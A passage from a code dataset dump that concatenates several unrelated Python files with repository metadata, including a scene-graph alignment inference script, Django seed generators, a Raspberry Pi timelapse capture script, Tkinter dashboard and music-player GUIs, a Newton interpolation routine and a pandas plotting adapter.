}\n\n","repo_name":"Aleyucra74/TCC-CCO-2023","sub_path":"Lambda/Alert/lambdaFuction_Alert.py","file_name":"lambdaFuction_Alert.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11002579983","text":"import argparse\nimport os \nimport os.path as osp\nimport time\nimport numpy as np \nfrom sklearn.metrics import confusion_matrix\n\nimport sys\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(parent_dir)\nsys.path.append('.')\n\nfrom engine.single_tester import SingleTester\nfrom engine.registration_evaluator import RegistrationEvaluator\nfrom utils import torch_util\nfrom aligner.sg_aligner import *\nfrom datasets.loaders import get_val_dataloader\nfrom configs import config, update_config\nfrom utils import common, scan3r, alignment\n\nclass AlignerOverlapper(SingleTester):\n def __init__(self, cfg, parser):\n super().__init__(cfg, parser=parser)\n\n self.run_reg = cfg.registration\n\n # Model Specific params\n self.modules = cfg.modules\n self.rel_dim = cfg.model.rel_dim\n self.attr_dim = cfg.model.attr_dim\n\n # Metrics params\n self.alignment_thresh = cfg.model.alignment_thresh\n self.corr_score_thresh = cfg.reg_model.corr_score_thresh\n\n self.aligner_overlapper_data = {'true' : [], 'pred' : []}\n self.registration_overlapper_data = {'true' : [], 'pred' : []}\n\n # dataloader\n start_time = time.time()\n dataset, data_loader = get_val_dataloader(cfg)\n loading_time = time.time() - start_time\n message = f'Data loader created: {loading_time:.3f}s collapsed.'\n self.logger.info(message)\n\n self.register_loader(data_loader)\n self.register_dataset(dataset)\n\n # model \n model = self.create_model()\n self.register_model(model)\n self.model.eval()\n\n # Registration\n self.reg_k = cfg.reg_model.K\n reg_snapshot = self.args.reg_snapshot\n self.registration_evaluator = RegistrationEvaluator(self.device, cfg, reg_snapshot, self.logger)\n\n def create_model(self):\n model = MultiModalEncoder(modules = self.modules, rel_dim = self.rel_dim, attr_dim=self.attr_dim).to(self.device)\n message = 'Model created'\n self.logger.info(message)\n return model\n \n def test_step(self, iteration, data_dict):\n output_dict = self.model(data_dict)\n return output_dict\n \n def print_metrics(self, results_dict):\n for key in results_dict.keys():\n metrics_dict = self.compute_precision_recall(results_dict[key])\n message = common.get_log_string(result_dict=metrics_dict, name=key, timer=self.timer)\n self.logger.critical(message)\n\n def compute_precision_recall(self, result_dict):\n tn, fp, fn, tp = confusion_matrix(result_dict['true'], result_dict['pred'], labels=[0, 1]).ravel()\n precision = round(tp / (tp + fp), 4)\n recall = round(tp / (tp + fn), 4)\n f1_score = round(2 * (precision * recall)/ (precision + recall), 4)\n metrics_dict = {'precision' : precision, 'recall' : recall, 'f1_score' : f1_score}\n\n return metrics_dict\n \n def eval_step(self, iteration, data_dict, output_dict):\n obj_cnt_start_idx = 0\n data_dict = torch_util.release_cuda(data_dict)\n embedding = output_dict['joint'] if len(self.modules) > 1 else output_dict[self.modules[0]]\n\n for batch_idx in range(self.test_loader.batch_size):\n src_objects_count = data_dict['graph_per_obj_count'][batch_idx][0]\n ref_objects_count = data_dict['graph_per_obj_count'][batch_idx][1]\n overlap = data_dict['overlap'][batch_idx]\n obj_cnt_end_idx = obj_cnt_start_idx + data_dict['tot_obj_count'][batch_idx]\n pcl_center = data_dict['pcl_center'][batch_idx]\n\n embedding_batch_idx = embedding[obj_cnt_start_idx : obj_cnt_end_idx]\n embedding_batch_idx /= embedding_batch_idx.norm(dim=1)[:, None]\n dist = 1 - torch.mm(embedding_batch_idx, embedding_batch_idx.transpose(0, 1))\n rank_list = torch.argsort(dist, dim=1)\n \n # Load subscene points\n src_scan_id = data_dict['scene_ids'][batch_idx][0]\n ref_scan_id = data_dict['scene_ids'][batch_idx][1]\n\n src_points = scan3r.load_plydata_npy(osp.join(self.test_dataset.subscans_scenes_dir, src_scan_id, 'data.npy'), obj_ids=None, return_ply_data=False)\n ref_points = scan3r.load_plydata_npy(osp.join(self.test_dataset.subscans_scenes_dir, ref_scan_id, 'data.npy'), obj_ids=None, return_ply_data=False)\n\n reg_data_dict = dict()\n reg_data_dict['src_points'] = src_points - pcl_center\n reg_data_dict['ref_points'] = ref_points - pcl_center\n reg_data_dict['gt_transform'] = np.eye(4)\n corr_score = self.registration_evaluator.run_normal_registration(reg_data_dict, evaluate_registration=False)\n\n if corr_score is not None:\n alignment_score = alignment.compute_alignment_score(rank_list, src_objects_count, ref_objects_count)\n \n self.registration_overlapper_data['pred'].append(1.0 if corr_score > self.corr_score_thresh else 0.0)\n self.registration_overlapper_data['true'].append(1.0 if overlap > 0.0 else 0.0)\n \n self.aligner_overlapper_data['pred'].append(1.0 if alignment_score > self.alignment_thresh else 0.0)\n self.aligner_overlapper_data['true'].append(1.0 if overlap > 0.0 else 0.0)\n \n obj_cnt_start_idx = obj_cnt_end_idx\n \n return { 'aligner_overlapper_data' : self.aligner_overlapper_data, 'registration_overlapper_data' : self.registration_overlapper_data}\n\ndef parse_args(parser=None):\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', dest='config', default='', type=str, help='configuration file name')\n parser.add_argument('--snapshot', default=None, help='load from snapshot')\n parser.add_argument('--test_epoch', type=int, default=None, help='test epoch')\n parser.add_argument('--test_iter', type=int, default=None, help='test iteration')\n parser.add_argument('--reg_snapshot', default=None, help='load from snapshot')\n\n args = parser.parse_args()\n return parser, args\n \ndef main():\n parser, args = parse_args()\n cfg = update_config(config, args.config)\n tester = AlignerOverlapper(cfg, parser)\n tester.run()\n\nif __name__ == '__main__':\n main()","repo_name":"sayands/sgaligner","sub_path":"src/inference/sgaligner/inference_find_overlapper.py","file_name":"inference_find_overlapper.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"37407907889","text":"from django.contrib.auth import get_user_model\nfrom faker import Faker\nfrom random import randint, choice, sample\nfrom .models import *\nimport psycopg2\n\n\nclass CategorySeed:\n\n model = Category\n\n @classmethod\n def seed(cls, **kwargs):\n \n default_categories = [\n {\n 'name': 'Desarrollo', \n 'icon_class': 'development', \n 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \n },\n {\n 'name': 'Marketing', \n 'icon_class': 'marketing', \n 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \n },\n {\n 'name': 'Diseño gráfico', \n 'icon_class': 'graphic-design', \n 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \n },\n ]\n\n result = []\n\n for item in default_categories:\n category = cls.model.objects.create(**item)\n result.append(category)\n\n return result\n\nclass SubCategorySeed:\n\n model = SubCategory\n category_model = Category\n\n @classmethod\n def seed(cls, **kwargs):\n fake = Faker()\n result = []\n\n for _ in range(0, randint(10, 15)):\n name = fake.text(max_nb_chars=randint(15, 25))\n description = fake.text(max_nb_chars=randint(15, 25))\n categories = cls.category_model.objects.all()\n\n data = {\n \"name\": name,\n \"parent\": choice(categories),\n \"description\": description,\n }\n\n result.append(cls.model.objects.create(**data))\n\n return result\n\nclass LanguageSeed:\n\n model = Language\n\n @classmethod\n def seed(cls, **kwargs):\n default_languages = [\n {\n 'name': 'Español',\n },\n {\n 'name': 'Ingles',\n },\n ]\n\n result = []\n\n for item in default_languages:\n result.append(cls.model.objects.create(**item))\n\n return result\n\nclass GroupSeed:\n\n model = Group\n category_model = Category\n sub_category_model = SubCategory\n tag_model = Tag\n language_model = Language\n user_model = get_user_model()\n\n @classmethod\n def populate(cls, group):\n users = cls.user_model.objects.filter(user_type='student')\n users = sample(list(users), randint(1, len(users)))\n\n group.following.add(*users)\n group.save()\n\n return group\n\n\n @classmethod\n def seed(cls, **kwargs):\n fake = Faker()\n result = []\n\n for _ in range(0, randint(10, 20)):\n title = fake.paragraph(nb_sentences=2)\n description = fake.paragraph(nb_sentences=7)\n short_description = fake.paragraph(nb_sentences=2)\n categories = cls.category_model.objects.all()\n sub_categories = cls.sub_category_model.objects.all()\n # tags = cls.tag_model.objects.all()\n languages = cls.language_model.objects.all()\n users = cls.user_model.objects.filter(user_type='leader')\n status = ['active','paused']\n\n data = {\n \"title\": title,\n \"user\": choice(users),\n \"description\": description,\n \"short_description\": short_description,\n \"category\": choice(categories),\n \"sub_category\": choice(sub_categories),\n \"language\": choice(languages),\n \"status\": choice(status),\n }\n\n try:\n print('Predata', data)\n group = cls.model.objects.create(**data)\n group = cls.populate(group)\n \n result.append(group)\n except Exception as e:\n print(e, data)\n\n return result\n\nclass LessonSeed:\n\n model = Lesson\n group_model = Group\n user_model = get_user_model()\n\n @classmethod\n def populate(cls, lesson):\n \n users = cls.user_model.objects.order_by(\"?\")\n users = users[:randint(1, len(users))]\n\n lesson.booking.add(*users)\n lesson.save()\n\n return lesson\n\n\n @classmethod\n def seed(cls, **kwargs):\n fake = Faker()\n result = []\n\n for group in cls.group_model.objects.all():\n for _ in range(0, randint(1, 20)):\n title = fake.paragraph(nb_sentences=2)\n description = fake.paragraph(nb_sentences=7)\n short_description = fake.paragraph(nb_sentences=2)\n status = ['active','paused']\n start_date = fake.date_time_this_month(before_now=True, after_now=True)\n\n data = {\n \"group\": group,\n \"title\": title,\n \"user\": group.user,\n \"description\": description,\n \"short_description\": short_description,\n \"is_privated\": random.choice([True, False]),\n \"url\": \"https://example.com\",\n \"status\": choice(status),\n \"start_date\": start_date,\n }\n\n try:\n print('Predata', data)\n lesson = cls.model.objects.create(**data)\n lesson = cls.populate(lesson)\n \n result.append(lesson)\n except Exception as e:\n print(e, data)\n\n return result\n","repo_name":"crisyelit/fitness-tracking-partner-master","sub_path":"apps/training/seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9518622733","text":"class Number:\n def __init__(self, num, den=1):\n self.num = num\n self.den = den\n\n def __str__(self):\n if self.num % self.den == 0:\n return str(num/den)\n else:\n return \"%d/%d\" % (num, den)\n\n\nx = Number(5)\nprint(x)","repo_name":"randint/capybara","sub_path":"python/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8624988450","text":"#!/usr/bin/env python3\n\nimport requests\n\n\ndef getHTMLText(url):\n\ttry:\n\t\tr = requests.get(url, timemout=30)\n\t\tr.raise_for_status()\n\t\tr.encoding=r.apparent_encoding\n\t\tprint(r.text)\n\t\treturn r.text\n\texcept:\n\t\treturn \"request error\"\n\n\nif '__name__' == '__main__':\n\turl = \"http://www.baidu.com\"\n\tprint(getHTMLText(url))\n# r = requests.get(\"http://www.baidu.com\")\n# r.raise_for_status\n# r.encoding=r.apparent_encoding\n# print(r.text)","repo_name":"lennon25/python_language_programming","sub_path":"web_crawlers/request_framework.py","file_name":"request_framework.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21965551245","text":"import logging\nimport os\nfrom time import sleep\nfrom datetime import datetime, timedelta\nimport pytz\nfrom astral import Astral\nimport picamera\n\ndef wait(ts_compare):\n '''\n Calculate the delay to the start of the specifict timestamp\n '''\n #ts = ts.replace(tzinfo=None)\n if ts_compare <= datetime.now(ACT_TZ):\n return\n\n delay = (ts_compare - datetime.now(ACT_TZ)).seconds\n sleep(delay)\n\ntry:\n ACT_TZ = pytz.timezone('Europe/Prague')\n TARGET_PATH = \"/mnt/remotenfs\"\n OUT_PATH = os.path.join(TARGET_PATH, datetime.now(ACT_TZ).strftime('%Y_%m_%d'))\n\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%d.%m.%y %H:%M:%S',\n filename=TARGET_PATH + '/' + datetime.now().strftime(\"%Y%m%d\") + '.log')\n\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n\n logging.info('Target folder: %s', OUT_PATH)\n\n if not os.path.isdir(OUT_PATH):\n os.makedirs(OUT_PATH)\n\n CITY_NAME = 'Prague'\n\n ASTRAL = Astral()\n ASTRAL.solar_depression = 'civil'\n\n CITY = ASTRAL[CITY_NAME]\n\n logging.info('Information for %s/%s', CITY_NAME, CITY.region)\n logging.info('Timezone: %s', CITY.timezone)\n logging.info('Latitude: %.02f; Longitude: %.02f', CITY.latitude, CITY.longitude)\n\n SUN = CITY.sun(date=datetime.now(), local=True)\n logging.info('Dawn: %s', str(SUN['dawn']))\n logging.info('Sunrise: %s', str(SUN['sunrise']))\n logging.info('Noon: %s', str(SUN['noon']))\n logging.info('Sunset: %s', str(SUN['sunset']))\n logging.info('Dusk: %s', str(SUN['dusk']))\n\n SUN_RISE = SUN['sunrise'].replace(microsecond=0, second=0, minute=0)+timedelta(hours=1)\n SUN_SET = SUN['sunset'].replace(microsecond=0, second=0, minute=0)\n\n logging.info('waiting to Sunrise ...')\n wait(SUN_RISE)\n logging.info('The sun is shining.')\n logging.info('Camera set up')\n\nexcept Exception:\n logging.exception(\"Init\")\n\ntry:\n with picamera.PiCamera(resolution=(1920, 1080), framerate=30) as camera:\n # Set ISO to the desired value\n camera.iso = 100\n sleep(2)\n camera.shutter_speed = camera.exposure_speed\n camera.exposure_mode = 'off'\n g = camera.awb_gains\n camera.awb_mode = 'off'\n camera.awb_gains = g\n camera.start_preview()\n sleep(2)\n logging.info(\"Let's go to make picture ...\")\n for filename in camera.capture_continuous(os.path.join(OUT_PATH, 'img{counter:04d}.jpg')):\n logging.info('Captured: %s', filename)\n sleep(300) # wait 5 minutes\n if SUN_SET <= datetime.now(ACT_TZ):\n break\nexcept Exception:\n logging.exception(\"Take a picture\")\n\ntry:\n logging.info('The dusk is coming ...')\n os.system(\"ffmpeg -r 10 -i \" + OUT_PATH + \"/img%04d.jpg -r 10 -vcodec libx264 -crf 20 -g 15 \" + OUT_PATH + \"/timelapse.mp4\")\n logging.info('Finish. Video was created.')\nexcept Exception:\n logging.exception(\"Make video\")\n","repo_name":"dejmekz/TimeLapse_Raspberry","sub_path":"timelapse.py","file_name":"timelapse.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3422133020","text":"import cufflinks as cf\nimport pandas as pd\nfrom IPython import get_ipython\nfrom auroraPSI.observation_plotter import ObservationPlotter\nfrom ipywidgets import interact, DatePicker\nfrom matplotlib import pyplot as plt\n\n\nclass PlotterAdapter(ObservationPlotter):\n\n def date_plot(self):\n interact(self._date_plot)\n\n def histogram_plot(self):\n interact(self._histogram_plot)\n\n def scatter_plot(self):\n interact(self._scatter_plot)\n\n def all_plot(self):\n ipython = get_ipython()\n ipython.magic(\"matplotlib widget\")\n plt.style.use(\"seaborn-whitegrid\")\n self._df[self._amus].plot()\n plt.legend(bbox_to_anchor=(1.04, 1.2), loc=\"upper left\")\n\n def all_error_plot(self):\n ipython = get_ipython()\n ipython.magic(\"matplotlib widget\")\n plt.style.use(\"seaborn-whitegrid\")\n self._df[self._err].plot()\n plt.legend(bbox_to_anchor=(1.04, 1.2), loc=\"upper left\")\n\n def __init__(self, observation_df: pd.DataFrame):\n self._df = observation_df.copy()\n cf.go_offline()\n\n self._scatter_plot = self._init_scatter_plot()\n self._date_plot = self._init_date_plot()\n self._histogram_plot = self._init_histogram_plot()\n self._amus = [column for column in self._df.columns if \"_err\" not in column]\n self._err = [column for column in self._df.columns if \"_err\" in column]\n\n def _init_scatter_plot(self):\n def _scatter_plot(x=list(self._df.columns),\n y=list(self._df.select_dtypes('number').columns)[1:],\n theme=list(cf.themes.THEMES.keys()),\n colorscale=list(cf.colors._scales_names.keys())):\n self._df.iplot(kind='scatter', x=x, y=y, mode='markers',\n xTitle=x.title(), yTitle=y.title(),\n # text='title',\n title=f'{y.title()} vs {x.title()}',\n theme=theme, colorscale=colorscale)\n\n return _scatter_plot\n\n def _init_date_plot(self):\n def _date_plot(y=list(self._df.select_dtypes('number').columns)[1:],\n theme=list(cf.themes.THEMES.keys()),\n colorscale=list(cf.colors._scales_names.keys()),\n start_date=DatePicker(\n description='Start Date',\n disabled=False,\n value=pd.to_datetime(self._df.index[0])\n ),\n end_date=DatePicker(\n description='End Date',\n disabled=False,\n value=pd.to_datetime(self._df.index[-1])\n )\n ):\n self._df.loc[pd.Timestamp(start_date):pd.Timestamp(end_date)] \\\n .iplot(kind='scatter', y=y, mode='markers', xTitle=\"date\", yTitle=y.title(),\n title=f'{y.title()}', theme=theme, colorscale=colorscale)\n\n return _date_plot\n\n def _init_histogram_plot(self):\n def _histogram_plot(x=list(self._df.select_dtypes('number').columns),\n theme=list(cf.themes.THEMES.keys()),\n colorscale=list(cf.colors._scales_names.keys())):\n self._df[str(x)].iplot(kind='histogram',\n xTitle=x.title(),\n title=f'histogram {x.title()}',\n theme=theme, colorscale=colorscale)\n\n return _histogram_plot\n\n @property\n def data_frame(self):\n return self._df\n\n @data_frame.setter\n def data_frame(self, observation_df: pd.DataFrame):\n self._df = observation_df.copy()\n cf.go_offline()\n self._scatter_plot = self._init_scatter_plot()\n self._date_plot = self._init_date_plot()\n self._histogram_plot = self._init_histogram_plot()\n","repo_name":"daniel-trejobanos/aurora","sub_path":"src/python/auroraPSI/pandas_plotter_adapter.py","file_name":"pandas_plotter_adapter.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5228357726","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass ToggledFrame(tk.Frame):\n\n def __init__(self, parent, text=\"\", *args, **options):\n tk.Frame.__init__(self, parent, *args, **options)\n\n self.show = tk.IntVar()\n self.show.set(0)\n\n self.title_frame = ttk.Frame(self)\n self.title_frame.pack(fill=\"x\", expand=1)\n\n ttk.Label(self.title_frame, text=text).pack(side=\"left\", fill=\"x\", expand=1)\n\n self.toggle_button = ttk.Checkbutton(self.title_frame, width=2, text='+', command=self.toggle,\n variable=self.show, style='Toolbutton')\n self.toggle_button.pack(side=\"left\")\n\n self.sub_frame = tk.Frame(self, relief=\"sunken\", borderwidth=1)\n\n def toggle(self):\n if bool(self.show.get()):\n self.sub_frame.pack(fill=\"x\", expand=1)\n self.toggle_button.configure(text='-')\n else:\n self.sub_frame.forget()\n self.toggle_button.configure(text='+')\n\n\ndef create_dashboard():\n root = tk.Tk()\n root.title(\"The Title Goes Here\")\n #root.minsize(width=400, height=300)\n #root.maxsize(width=1200, height=900)\n\n root_label = tk.Label(root, text=\"The Label At The Top\")\n root_label.pack()\n\n t = ToggledFrame(root, text='Load Project', relief=\"raised\", borderwidth=1)\n t.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n # load .csv code\n\n t1 = ToggledFrame(root, text='Pie Charts', relief=\"raised\", borderwidth=1)\n t1.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n\n ttk.Label(t1.sub_frame, text='Pie Chart 1').pack(side=\"left\")\n ttk.Label(t1.sub_frame, text='Pie Chart 2').pack(side=\"right\")\n\n t2 = ToggledFrame(root, text='Data 1', relief=\"raised\", borderwidth=1)\n t2.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n\n ttk.Label(t2.sub_frame, text='Input field 1').grid(row=0,column=0)\n ttk.Entry(t2.sub_frame).grid(row=0,column=1)\n ttk.Label(t2.sub_frame, text='Input field 2').grid(row=0,column=2)\n ttk.Entry(t2.sub_frame).grid(row=0,column=3)\n ttk.Label(t2.sub_frame, text='Input field 3').grid(row=0,column=4)\n ttk.Entry(t2.sub_frame).grid(row=0,column=5)\n ttk.Label(t2.sub_frame, text='Input field 4').grid(row=1,column=0)\n ttk.Entry(t2.sub_frame).grid(row=1,column=1)\n ttk.Label(t2.sub_frame, text='Input field 5').grid(row=1,column=2)\n ttk.Entry(t2.sub_frame).grid(row=1,column=3)\n ttk.Label(t2.sub_frame, text='Input field 6').grid(row=1,column=4)\n ttk.Entry(t2.sub_frame).grid(row=1,column=5)\n\n t3 = ToggledFrame(root, text='Data 2', relief=\"raised\", borderwidth=1)\n t3.pack(fill=\"x\", expand=1, pady=2, padx=2, anchor=\"n\")\n for i in range(3):\n ttk.Label(t3.sub_frame, text='Bar' + str(i)).pack()\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n create_dashboard()\n","repo_name":"NazarAmin/Dashboard","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72732926867","text":"import math\r\n\r\n\r\ndef u_cal(u, n):\r\n temp = u\r\n for i in range(1, n):\r\n temp = temp * (u - i)\r\n return temp\r\n\r\n\r\nn = int(input(\"Enter value for n : \"))\r\nx = [0] * n\r\ny = [[0 for i in range(n)] for j in range(n)]\r\n\r\n# for i in range(0, n):\r\n# x[i] = input(\"Enter value for x[{0}] : \".format(i))\r\n# for i in range(0, n):\r\n# y[i][0] = input(\"Enter value for y[{0}] : \".format(i))\r\n\r\nx = [1791, 1801, 1811, 1821, 1831]\r\ny[0][0] = 48\r\ny[1][0] = 65\r\ny[2][0] = 71\r\ny[3][0] = 83\r\ny[4][0] = 96\r\n\r\nestimate = float(input(\"Enter value to be estimated from given data : \"))\r\nh = float(x[1] - x[0]) # calculating h\r\nu = float((estimate - x[0]) / h)\r\ntot = y[0][0]\r\n\r\n\r\n# creating table\r\nfor i in range(1, n):\r\n for j in range(n - i):\r\n y[j][i] = y[j + 1][i - 1] - y[j][i - 1]\r\n\r\n# printing table\r\nfor i in range(n):\r\n print(x[i], end=\"\\t\")\r\n for j in range(n - i):\r\n print(y[i][j], end=\"\\t\")\r\n print(\"\")\r\n\r\n\r\nfor i in range(1, n):\r\n tot = tot + (u_cal(u, i) * y[0][i]) / math.factorial(int(i))\r\n\r\nprint(\"Estimated value of {0} is = {1}\".format(estimate, tot))","repo_name":"FocusBT/Numerical-Computing-Coded-Methods","sub_path":"Newton Forward Formula.py","file_name":"Newton Forward Formula.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23210902886","text":"\"\"\"\n Question 4 of the first exercise. Calculate Average Pregnancy Length for the first child and the other children\n separately, also mention the difference\n\"\"\"\n\nimport survey\n\n# create an instance of the Pregnancies table\ntable = survey.Pregnancies()\n\n# this table contains a list of records of type Pregnancy. Make sure to call the ReadRecords method on the table object\n# which will read the data file and store all the records.\ntable.ReadRecords()\n\nfirstChildCount = 0\nfirstChildPregnancyLengthSum = 0\nrestChildrenCount = 0\nrestChildrenPregnancyLengthSum = 0\n\nfor record in table.records:\n if record.birthord != 'NA':\n if record.birthord == 1:\n firstChildCount += 1\n firstChildPregnancyLengthSum += record.prglength\n else:\n restChildrenCount += 1\n restChildrenPregnancyLengthSum += record.prglength\n\n\naverageFirstChildPregnancyLength = 0 if firstChildCount == 0 else firstChildPregnancyLengthSum / firstChildCount\naverageRestChildrenPregnancyLength = 0 if restChildrenCount == 0 else restChildrenPregnancyLengthSum / restChildrenCount\n\nprint(\"Average Pregnancy length for the first child is {} and for rest of the children is {}\"\n .format(averageFirstChildPregnancyLength, averageRestChildrenPregnancyLength))\nprint(\"And the difference is {:.2f}\".format(averageFirstChildPregnancyLength - averageRestChildrenPregnancyLength))","repo_name":"dmast3r/StatsWithPython","sub_path":"Chapter-1/Average Pregnancy Length.py","file_name":"Average Pregnancy Length.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35663994193","text":"from tkinter import *\n\n#importando o pillow\nfrom PIL import Image,ImageTk\n\n#importando o pygame\nimport pygame\nfrom pygame import mixer\n\nimport os\nimport random\n\nco0 = \"#f0f3f5\" # Preta\nco1 = \"#feffff\" # branca\nco2 = \"#3fb5a3\" # verde\nco3 = \"#2e2d2c\" # black\nco4 = \"#403d3d\" # letra\nco5 = \"#4a88e8\" # Azul \n\n\n#Criação da janela\n\njanela = Tk()\njanela.title(\"MySound\")\njanela.geometry('372x255')\njanela.configure(background=co1)\njanela.resizable(width=FALSE,height=FALSE)\n\n\nframe_esquerda = Frame(janela,width=170,height=150,bg=co3)\nframe_esquerda.grid(row=0,column=0,pady=1,padx=1,sticky=NSEW)\n\nframe_direita = Frame(janela,width=270,height=150,bg=co3)\nframe_direita.grid(row=0,column=1,pady=1,padx=0,sticky=NSEW)\n\n\nframe_baixo = Frame(janela,width=423,height=100,bg=co3)\nframe_baixo.grid(row=1,column=0,columnspan=3,pady=1,padx=0,sticky=NSEW)\n\n#configurando o frame do lado esquerdo\n\nimg_1 = Image.open('res/icon1.png')\nimg_1 = img_1.resize((130,130))\nimg_1 = ImageTk.PhotoImage(img_1)\n\nl_logo = Label(frame_esquerda, height=130,image=img_1,compound=LEFT,padx=0,anchor='nw',font=('ivy 16 bold'), bg=co3,fg=co3)\nl_logo.place(x=8,y=12)\n\n#criando funcoes\n\n#Musica anterior\ndef previous_music():\n tocando = l_rodando['text'] \n index = musicas.index(tocando)\n novo_index = index-1\n tocando = musicas[novo_index]\n mixer.music.load(tocando)\n mixer.music.play()\n listbox.delete(0,END)\n mostrar()\n listbox.select_set(novo_index)\n listbox.config(selectmode=SINGLE)\n l_rodando['text'] = tocando\n \n#Randomizando as musicas\ndef random_music():\n r = random.choice(musicas)\n novo_index = musicas.index(r)\n\n tocando = musicas[novo_index]\n \n mixer.music.load(tocando)\n mixer.music.play()\n\n #deletando os elementos na playlist\n listbox.delete(0,END)\n\n mostrar()\n\n listbox.select_set(novo_index)\n listbox.config(selectmode=SINGLE)\n l_rodando['text'] = tocando\n \n#Proxima Musica\ndef next_music():\n tocando = l_rodando['text'] \n index = musicas.index(tocando)\n\n novo_index = index+1\n\n tocando = musicas[novo_index]\n \n mixer.music.load(tocando)\n mixer.music.play()\n\n #deletando os elementos na playlist\n listbox.delete(0,END)\n\n mostrar()\n\n listbox.select_set(novo_index)\n listbox.config(selectmode=SINGLE)\n l_rodando['text'] = tocando\n \n\n#Tocar musica\ndef play_music():\n rodando = listbox.get(ACTIVE)\n l_rodando['text'] = rodando\n mixer.music.load(rodando)\n mixer.music.play()\n\n#Pausar musica\ndef pause_music():\n mixer.music.pause()\n#continuar musica\ndef continue_music():\n mixer.music.unpause()\n#Parar musica\ndef stop_music():\n mixer.music.stop()\n\n#Configurando o frame do lado direito\n\nlista = ['joao','lucas','andreia','joao','lucas','andreia','joao','lucas','andreia','joao','lucas','andreia','joao','lucas','andreia']\nlistbox = Listbox(frame_direita, width=22, height=10, selectmode=SINGLE, font=('arial 9 bold') , bg=co3, fg=co1)\nlistbox.grid(row=0,column=0)\n\ns = Scrollbar(frame_direita)\ns.grid(row=0,column=1,sticky=NSEW)\n\nlistbox.config(yscrollcommand=s.set)\ns.config(command=listbox.yview)\n\n\n#Configurando o frame de baixo\n\nl_rodando = Label(frame_baixo,text='Escolha uma musica na lista',width=44,justify=LEFT,anchor='nw',font=('ivy 10'), bg=co1,fg=co4)\nl_rodando.place(x=0,y=1)\n\nimg_2 = Image.open('res/2.png')\nimg_2 = img_2.resize((30,30))\nimg_2 = ImageTk.PhotoImage(img_2)\nb_anterior = Button(frame_baixo,command=previous_music,width=40,height=40,image=img_2,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_anterior.place(x=38,y=35)\n\n\n\nimg_3 = Image.open('res/3.png')\nimg_3 = img_3.resize((30,30))\nimg_3 = ImageTk.PhotoImage(img_3)\nb_play = Button(frame_baixo,command=play_music,width=40,height=40,image=img_3,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_play.place(x=84,y=35)\n\n\n\nimg_4 = Image.open('res/4.png')\nimg_4 = img_4.resize((30,30))\nimg_4 = ImageTk.PhotoImage(img_4)\nb_proxima = Button(frame_baixo,command=next_music,width=40,height=40,image=img_4,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_proxima.place(x=130,y=35)\n\n\n\nimg_5 = Image.open('res/5.png')\nimg_5 = img_5.resize((30,30))\nimg_5 = ImageTk.PhotoImage(img_5)\nb_pausar = Button(frame_baixo,command=pause_music,width=40,height=40,image=img_5,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_pausar.place(x=176,y=35)\n\n\n\nimg_6 = Image.open('res/6.png')\nimg_6 = img_6.resize((30,30))\nimg_6 = ImageTk.PhotoImage(img_6)\nb_continuar = Button(frame_baixo,command=continue_music,width=40,height=40,image=img_6,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_continuar.place(x=222,y=35)\n\n\n\nimg_7 = Image.open('res/7.png')\nimg_7 = img_7.resize((30,30))\nimg_7 = ImageTk.PhotoImage(img_7)\nb_stop = Button(frame_baixo,command=stop_music,width=40,height=40,image=img_7,font=('ivy 10 bold'),relief=RAISED,overrelief=RIDGE, bg=co3,fg=co1)\nb_stop.place(x=268,y=35)\n\nimg_8 = Image.open('res/8.png')\nimg_8 = img_8.resize((30,30))\nimg_8 = ImageTk.PhotoImage(img_8)\nb_random = Button(frame_baixo,command=random_music,width=40,height=40,image=img_8,font=('ivy 10 